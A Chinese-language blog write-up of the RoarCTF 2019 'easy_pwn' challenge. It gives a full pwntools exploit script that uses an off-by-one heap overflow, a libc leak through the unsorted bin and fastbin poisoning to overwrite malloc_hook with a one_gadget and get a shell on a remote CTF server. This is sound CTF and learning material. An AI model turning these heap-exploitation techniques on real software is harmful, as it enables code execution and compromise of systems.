RoarCTF-2019


RoarCTF 2019

easy_pwn

思路:
write note 存在 off-by-one 漏洞。填充 chunk A 溢出改写下一个 chunk B 的 size 来扩大溢出范围，再分配 chunk B 来溢出改写已 free 掉的 chunk C 的 fd 为 small chunk D，free 掉 small chunk D，show note 泄漏 unsorted_bin 得到 libc_base。
再通过溢出改写 fast_bin chunk 的 fd，分配到 malloc_hook 附近写入 one_gadget，触发 malloc_printerr 来 getshell。

#!/usr/bin/env python
#coding=utf8
from pwn import *
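# Target connection.
#
# The original script called process('./easy_pwn') and then immediately
# rebound `p` to the remote socket, so a local child process was spawned,
# never used and never closed.  `LOCAL` now selects exactly one target.
LOCAL = False
if LOCAL:
    p = process('./easy_pwn')
else:
    p = remote('39.97.182.233', 40205)
ctx = context
# Open gdb/pwntools terminals as a horizontal tmux split.
ctx.terminal = ['tmux', 'splitw', '-h']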


#----- debug info -----#
# ctx.log_level = 'debug'

#----- debug info -----#

#----- quick script -----#
def sd(c):
    """Send *c* to the target verbatim (no trailing newline)."""
    return p.send(c)

def sdl(c):
    """Send *c* followed by a newline."""
    return p.sendline(c)

def sda(a, c):
    """Wait until *a* has been received, then send *c*."""
    return p.sendafter(a, c)

def sdla(a, c):
    """Wait until *a* has been received, then send *c* plus a newline."""
    return p.sendlineafter(a, c)

def rl():
    """Receive one line."""
    return p.recvline()

def ru(c):
    """Receive up to *c*; the second argument (drop=True) strips the delimiter."""
    return p.recvuntil(c, True)

def rle(c):
    """Receive lines until one ends with *c*, returned without its line ending."""
    return p.recvline_endswith(c, keepends=False)

def rls(c):
    """Receive lines until one starts with *c*, returned without its line ending."""
    return p.recvline_startswith(c, False)

def rn(c):
    """Receive exactly *c* bytes."""
    return p.recvn(c)

def uu64(c):
    """Unpack at most 8 bytes as a u64, zero-padding shorter input on the right.

    Endianness follows the pwntools context (little-endian by default).
    """
    return u64(c.ljust(8, '\x00'))

def itr():
    """Hand the connection over to the user interactively."""
    return p.interactive()
#----- quick script -----#

#----- global variables -----#

#----- global variables -----#
def cmd(c):
    """Answer the program's ``choice: `` prompt with menu option *c*."""
    p.sendlineafter('choice: ', str(c))

def add(sz):
    """Menu option 1 (add): request a note of *sz* bytes."""
    cmd(1)
    p.sendlineafter('size: ', str(sz))

def edit(idx, sz, c):
    """Menu option 2 (edit): write *c* into note *idx* with length *sz*.

    The content is sent raw (no newline appended), so binary payloads
    containing ``\\n`` are delivered intact.
    """
    cmd(2)
    p.sendlineafter('index: ', str(idx))
    p.sendlineafter('size: ', str(sz))
    p.sendafter('content: ', c)

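def edit_over10(idx, sz, c):
    """Like :func:`edit`, but reports the length as ``sz + 10``.

    The write-up's 思路 attributes the primitive to an off-by-one in the
    edit handler; the +10 is presumably what makes the handler accept the
    extra size byte appended to *c* — verify against the binary.  Delegates
    to :func:`edit` so the prompt sequence is defined in one place instead
    of being duplicated.
    """
    edit(idx, sz + 10, c)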

def free(idx):
    """Menu option 3 (free): release note *idx*."""
    cmd(3)
    p.sendlineafter('index: ', str(idx))

def show(idx):
    """Menu option 4 (show): print the contents of note *idx*."""
    cmd(4)
    p.sendlineafter('index: ', str(idx))

def attack():
    """Run the exploit sequence described in the 思路 section against ``p``.

    Outline (each phase depends on the previous one, so statement order
    matters):
      1. allocate notes 0-14 so that later overflows land on known
         neighbours;
      2. use the off-by-one in edit to enlarge a note, free it and
         re-allocate it larger, gaining a write that overlaps the next
         note's header;
      3. redirect a freed 0x20-sized note's fd into the 0x80 note, free
         that one into the unsorted bin and read its pointer back via
         ``show`` to derive ``base``;
      4. repeat the overlap trick on the 0x60 notes, point a fastbin fd at
         ``fake_chunk`` near malloc_hook and write ``one`` there;
      5. free a note with a corrupted size so malloc_printerr fires and
         hand the session over interactively.
    Recovered addresses are printed as they are obtained.  Offsets
    (0x3c4b78, 3951365, 0xf02a4) are specific to the remote libc used by
    the write-up.
    """
    # show 0x01122
    # Phase 1: lay out the heap.  Notes 0/1 and 4/5 are the pairs used for
    # the first overlap, 6 is the "small chunk" that will be leaked.
    add(0x18) #0
    add(0x18) #1

    add(0x18) #2
    add(0x18) #3

    add(0x18) #4
    add(0x18) #5
    add(0x80) #6 0xc0
    add(0x18) #7

    # Notes 8-14 are used for the second (fastbin) phase.
    add(0x28) #8
    add(0x28) #9
    add(0x60) #10
    add(0x60) #11
    add(0x28) #12
    add(0x28) #13
    add(0x28) #14

    # Phase 2: the byte after 0x18 bytes of filler lands on note 1's size
    # field (off-by-one, see 思路) and bumps it to 0x41.
    edit_over10(0,0x18,'a'*0x18+'\x41') #prepare overflow 
    free(1)
    # Re-allocate at the enlarged size so note 1 now spans into note 2.
    add(0x38) #1
    edit(1,0x20,'\x00'*0x18+p64(0x21)) #recover size;

    # Same trick on the 4/5 pair, enlarged to 0xb1 so note 5 reaches
    # note 6's header.
    edit_over10(4,0x18,'a'*0x18+'\xb1') 
    free(5)
    add(0xa1) #5
    edit(5,0x20,'\x00'*0x18+p64(0x21))

    # Phase 3: free notes 3 and 2 (the "chunk C" of the 思路).
    free(3)
    free(2)

    # Through note 1's overlap keep note 2's size at 0x21 and overwrite the
    # low byte of its fd with 0xc0 -- presumably note 6 (cf. the "0xc0"
    # remark on its allocation); verify with a debugger if the offsets
    # differ.
    edit(1,0x21,'a'*0x18+p64(0x21)+'\xc0')
    add(0x18) #2
    add(0x18) #3

    # Give note 6 a small-chunk size (0x91) via note 5's overlap, free it
    # into the unsorted bin, then read the bin pointer back through the
    # overlapping note 3.
    edit(5,0x20,'\x00'*0x18+p64(0x91))
    free(6)
    show(3)

    # 15 bytes are read; the first 9 are prompt/prefix text and the rest
    # is the leaked pointer.
    unsorted_bin=uu64(rn(6+9)[9:])
    print(hex(unsorted_bin))
    # libc base = leaked unsorted-bin pointer minus its offset in this libc.
    base=unsorted_bin-0x3c4b78
    print(hex(base))
    # Fake chunk address near malloc_hook (per 思路); 3951365 == 0x3c4b05.
    fake_chunk=base+3951365-0x10-0x8
    # one_gadget offset for this libc.
    one=base+0xf02a4
    print(hex(one))

    # Presumably takes the unsorted chunk back out of the bin before the
    # fastbin phase -- confirm.
    add(0x80)

    # Phase 4: enlarge note 9 via note 8 (size byte 0xa1), re-allocate it
    # so it overlaps note 10, and restore note 10's 0x71 size.
    edit_over10(8,0x28,'a'*0x28+'\xa1')
    free(9)
    add(0x98) #9
    edit(9,0x30,'\x00'*0x28+p64(0x71))

    # Free 11 then 10 into the 0x70 fastbin and point 10's fd at fake_chunk
    # (the "改写 fast_bin chunk fd" step).
    free(11)
    free(10)
    edit(9,0x38,'\x00'*0x28+p64(0x71)+p64(fake_chunk))
    # First allocation returns note 10; the second is served from fake_chunk.
    add(0x60) #10
    add(0x60) #11

    # Write the one_gadget address at offset 0x13 inside the fake chunk.
    edit(11,0x13+8,0x13*'\x00'+p64(one))
    # Purpose unclear from the script alone; possibly just a sanity check
    # that the program still responds.
    show(0)

    # Phase 5: corrupt note 13's size via note 12 and free it; the 思路
    # says this triggers malloc_printerr and yields a shell.
    edit_over10(12,0x28,'a'*0x28+'\x88')
    free(13)

    #gdb.attach(p,'b *')
    #free(6)

    #add(0x20)
    itr()

    pass


# Script entry point: run the full exploit sequence against the connected
# target.  Nothing else is executed on import.
if __name__=="__main__":
    attack()


文章标题:RoarCTF-2019

本文作者:枫云李

发布时间:2019-10-12, 00:00:00

最后更新:2020-04-11, 01:25:10

原始链接:https://primelyw.github.io/2019/10/12/RoarCTF-2019/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
